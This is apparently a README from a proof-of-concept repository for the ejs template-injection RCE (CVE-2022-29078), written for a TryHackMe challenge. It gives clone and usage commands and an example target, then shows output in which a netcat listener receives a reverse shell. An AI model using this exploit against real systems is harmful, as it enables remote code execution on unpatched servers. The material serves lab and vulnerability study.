Github ejs 代码注入漏洞
描述:Github ejs是嵌入式 JavaScript 模板。 ejs 3.1.6 版本存在代码注入漏洞,该漏洞源于 settings[view options][outputFunctionName] 中可以进行服务器端模板注入。 这被解析为内部选项,并使用任意 OS 命令(在模板编译时执行)覆盖 outputFunctionName 选项。
Serverside Template Injection (SSTI) RCE - THM challenge "whiterose"
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THM Challenge SSTI exploit
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<img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
## 📜 Description
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
## 📚 Table of Contents
- 📜 [Description](#-description)
- 🛠️ [Installation](#-installation)
- 💁 [References](#-references)
## 🛠️ Installation and Usage
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git && pip install colorama && cd CVE-2022-29078
$ python3 CVE-2022-29078.py -h
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD
Send a crafted POST request with custom URL, username, and password.
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target URL (e.g., http://admin.cyprusbank.thm/settings)
-u USER, --user USER Username to send in the request
-p PASSWORD, --password PASSWORD
Password to send in the request
Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd
## Output
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
[+] Payload delivered successfully. Awaiting reverse shell connection...
## Netcat listener
$ sudo rlwrap -cAr nc -lvnp 443
[sudo] password for l0n3m4n:
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
## 💁 References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001
[4.0K] /data/pocs/e7c59e1824393d0314e79acfe22e09d8f93ed8cb
├── [3.7K] CVE-2022-29078.py
├── [4.3K] README.md
└── [ 31K] whiterose.jpeg
0 directories, 3 files
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